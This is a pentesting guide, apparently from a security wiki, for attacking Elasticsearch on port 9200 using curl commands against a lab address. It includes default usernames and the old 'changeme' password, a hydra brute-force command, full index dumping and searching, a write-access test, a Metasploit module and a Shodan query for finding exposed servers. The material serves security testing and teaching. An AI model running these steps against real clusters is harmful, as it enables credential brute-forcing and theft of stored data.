9200 - Pentesting Elasticsearch
From the main page you can find some useful descriptions:
Elasticsearch is a distributed, open source search and analytics engine for all types of data, including textual, numerical, geospatial, structured, and unstructured. Elasticsearch is built on Apache Lucene and was first released in 2010 by Elasticsearch N.V. (now known as Elastic). Known for its simple REST APIs, distributed nature, speed, and scalability, Elasticsearch is the central component of the Elastic Stack, a set of open source tools for data ingestion, enrichment, storage, analysis, and visualization. Commonly referred to as the ELK Stack (after Elasticsearch, Logstash, and Kibana), the Elastic Stack now includes a rich collection of lightweight shipping agents known as Beats for sending data to Elasticsearch.
An Elasticsearch index is a collection of documents that are related to each other. Elasticsearch stores data as JSON documents. Each document correlates a set of keys (names of fields or properties) with their corresponding values (strings, numbers, Booleans, dates, arrays of values, geolocations, or other types of data).
Elasticsearch uses a data structure called an inverted index, which is designed to allow very fast full-text searches. An inverted index lists every unique word that appears in any document and identifies all of the documents each word occurs in.
During the indexing process, Elasticsearch stores documents and builds an inverted index to make the document data searchable in near real-time. Indexing is initiated with the index API, through which you can add or update a JSON document in a specific index.
Default port: 9200/tcp
The protocol used to access Elasticsearch is HTTP. When you access it via HTTP you will find some interesting information: http://10.10.10.115:9200/
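A quick way to grab that banner is with curl; the exact values in the response (node name, version, build hash) depend on the target, but the overall shape is always the same:

```bash
# Unauthenticated banner grab; the JSON response includes the cluster name,
# the exact Elasticsearch version and the tagline "You Know, for Search"
curl -s http://10.10.10.115:9200/
```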
If you don't see that response when accessing /, see the following section.
By default Elasticsearch doesn't have authentication enabled, so you can access everything inside the database without using any credentials.
You can verify that authentication is disabled with a request to:
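As a sketch, the built-in users endpoint is a common choice for this check (the path is an assumption here; recent versions expose it at /_security/user, older ones at /_xpack/security/user):

```bash
# Path assumed: /_security/user (use /_xpack/security/user on older versions)
# - an error complaining that security is not enabled  -> no authentication at all
# - a 401 Unauthorized                                  -> credentials are required
curl -s http://10.10.10.115:9200/_security/user
```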
However, if you send a request to / and receive a response like the following one:
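With authentication configured the server typically rejects the request with a 401 security_exception, roughly like this (exact wording varies between versions):

```json
{
  "error": {
    "type": "security_exception",
    "reason": "missing authentication credentials for REST request [/]"
  },
  "status": 401
}
```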
That means that authentication is configured and you need valid credentials to obtain any info from Elasticsearch. Then, you can try to bruteforce it (it uses HTTP basic auth, so anything that can brute force HTTP basic auth can be used). Here you have a list of **default usernames**: elastic (superuser), remote_monitoring_user, beats_system, logstash_system, kibana, kibana_system, apm_system, _anonymous_. Older versions of Elasticsearch have the default password **changeme** for the elastic user.
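For instance, you can test the old default credentials directly with curl, and any generic HTTP basic auth brute forcer works against the same port (the wordlist below is a placeholder):

```bash
# Quick test of the legacy default credentials
curl -s -u elastic:changeme http://10.10.10.115:9200/

# Generic HTTP basic auth brute force with hydra (passwords.txt is a placeholder)
hydra -l elastic -P passwords.txt -s 9200 -f 10.10.10.115 http-get /
```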
Here are some endpoints that you can access via GET to obtain some information about Elasticsearch:
| _cat | /_cluster | /_security |
| --- | --- | --- |
| /_cat/segments | /_cluster/allocation/explain | /_security/user |
| /_cat/shards | /_cluster/settings | /_security/privilege |
| /_cat/repositories | /_cluster/health | /_security/role_mapping |
| /_cat/recovery | /_cluster/state | /_security/role |
| /_cat/plugins | /_cluster/stats | /_security/api_key |
| /_cat/pending_tasks | /_cluster/pending_tasks | |
| /_cat/nodes | /_nodes | |
| /_cat/tasks | /_nodes/usage | |
| /_cat/templates | /_nodes/hot_threads | |
| /_cat/thread_pool | /_nodes/stats | |
| /_cat/ml/trained_models | /_tasks | |
| /_cat/transforms/_all | /_remote/info | |
| /_cat/aliases | | |
| /_cat/allocation | | |
| /_cat/ml/anomaly_detectors | | |
| /_cat/count | | |
| /_cat/ml/data_frame/analytics | | |
| /_cat/ml/datafeeds | | |
| /_cat/fielddata | | |
| /_cat/health | | |
| /_cat/indices | | |
| /_cat/master | | |
| /_cat/nodeattrs | | |
| /_cat/nodes | | |
These endpoints were taken from the documentation where you can find more.
Also, if you access /_cat the response will contain the /_cat/* endpoints supported by the instance.
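A quick way to sweep a handful of them in one go (host and endpoint selection are just an example):

```bash
# Query several informational endpoints and print each response
for ep in _cluster/health _cluster/settings "_cat/nodes?v" _cat/templates _security/user; do
  echo "=== /$ep ==="
  curl -s "http://10.10.10.115:9200/$ep"
  echo
done
```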
In /_security/user (if auth is enabled) you can see which user has the role superuser.
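If you do have credentials and jq is available, a small sketch like this lists the users whose roles include superuser (credentials are placeholders):

```bash
# Print every user that has the superuser role
curl -s -u elastic:changeme http://10.10.10.115:9200/_security/user \
  | jq -r 'to_entries[] | select(.value.roles | index("superuser")) | .key'
```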
You can gather all the indices by accessing http://10.10.10.115:9200/_cat/indices?v
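The same request from the command line:

```bash
# The ?v flag adds column headers (health, status, index, docs.count, store.size, ...)
curl -s "http://10.10.10.115:9200/_cat/indices?v"
```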
To obtain information about which kind of data is saved inside an index you can access: http://host:9200/<index>, for example in this case http://10.10.10.115:9200/bank
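From the command line the same lookup would be:

```bash
# Returns the aliases, mappings (field names and types) and settings of the index
curl -s "http://10.10.10.115:9200/bank?pretty=true"
```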
If you want to dump all the contents of an index you can access: http://host:9200/<index>/_search?pretty=true
like http://10.10.10.115:9200/bank/_search?pretty=true
Take a moment to compare the contents of each document (entry) inside the bank index with the fields of this index that we saw in the previous section.
So, at this point you may notice that there is a field called "total" inside "hits" that indicates that 1000 documents were found inside this index, but only 10 were retrieved. This is because by default there is a limit of 10 documents.
But, now that you know that this index contains 1000 documents, you can dump all of them by indicating the number of entries you want to dump in the size parameter: http://10.10.10.115:9200/bank/_search?pretty=true&size=1000
Note: if you indicate a bigger number, all the entries will be dumped anyway; for example, you could indicate size=9999 and it would be unusual if there were more entries (but you should check).
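If you prefer not to guess the size, a small sketch like the following reads the real total first and reuses it (the jq expression handles both the older numeric hits.total and the newer object form):

```bash
# Get the real document count of the index, then dump everything in one request
total=$(curl -s "http://10.10.10.115:9200/bank/_search" | jq '.hits.total.value? // .hits.total')
curl -s "http://10.10.10.115:9200/bank/_search?pretty=true&size=$total"
```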
In order to dump everything, you can just go to the same path as before but without indicating any index: http://host:9200/_search?pretty=true
like http://10.10.10.115:9200/_search?pretty=true
Remember that in this case the default limit of 10 results will be applied. You can use the size parameter to dump a larger number of results. Read the previous section for more information.
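For example, dumping across every index and listing which indices the returned documents belong to (the size value here is arbitrary):

```bash
# Dump up to 1000 documents from all indices and print the distinct index names they come from
curl -s "http://10.10.10.115:9200/_search?size=1000" | jq -r '.hits.hits[]._index' | sort -u
```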
If you are looking for some information, you can do a raw search on all the indices by going to http://host:9200/_search?pretty=true&q=<search_term>
like in http://10.10.10.115:9200/_search?pretty=true&q=Rockwell
If you want just to search on an index you can just specify it on the path: http://host:9200/<index>/_search?pretty=true&q=<search_term>
Note that the q parameter used to search content supports regular expressions.
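For example (the search term is just the one used above; add -u user:pass if authentication is enabled):

```bash
# Free-text search across every index
curl -s "http://10.10.10.115:9200/_search?pretty=true&q=Rockwell"

# Same search restricted to a single index
curl -s "http://10.10.10.115:9200/bank/_search?pretty=true&q=Rockwell"
```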
You can also use something like https://github.com/misalabs/horuz to fuzz an elasticsearch service.
You can check your write permissions by trying to create a new document inside a new index, running something like the following:
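A minimal sketch of such a request (index name, type and document values are just an example):

```bash
# Create a document (and implicitly the index "bookindex") to test write access
# (on recent versions without mapping types you would use /bookindex/_doc/1 instead)
curl -s -X PUT "http://10.10.10.115:9200/bookindex/books/1" \
  -H 'Content-Type: application/json' \
  -d '{"bookId": "A00-1", "author": "Sample", "publisher": "Sample", "name": "Write check"}'
```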
That command will create a new index called bookindex with a document of type books that has the attributes "bookId", "author", "publisher" and "name".
Notice how the new index appears now in the list:
And note the automatically created properties:
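Both checks can be repeated against the API (output omitted; paths as used earlier in this page):

```bash
# The new index now shows up in the listing...
curl -s "http://10.10.10.115:9200/_cat/indices?v"

# ...and its mapping shows the properties Elasticsearch inferred for each field
curl -s "http://10.10.10.115:9200/bookindex/_mapping?pretty=true"
```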
Some tools will obtain some of the data presented before:
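For instance, Metasploit ships an auxiliary scanner for enumerating indices (module name quoted from memory, so double-check it in your msfconsole):

```bash
# Enumerate indices with Metasploit's Elasticsearch scanner module
msfconsole -q -x "use auxiliary/scanner/elasticsearch/indices_enum; set RHOSTS 10.10.10.115; run; exit"
```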
Shodan: `port:9200 elasticsearch`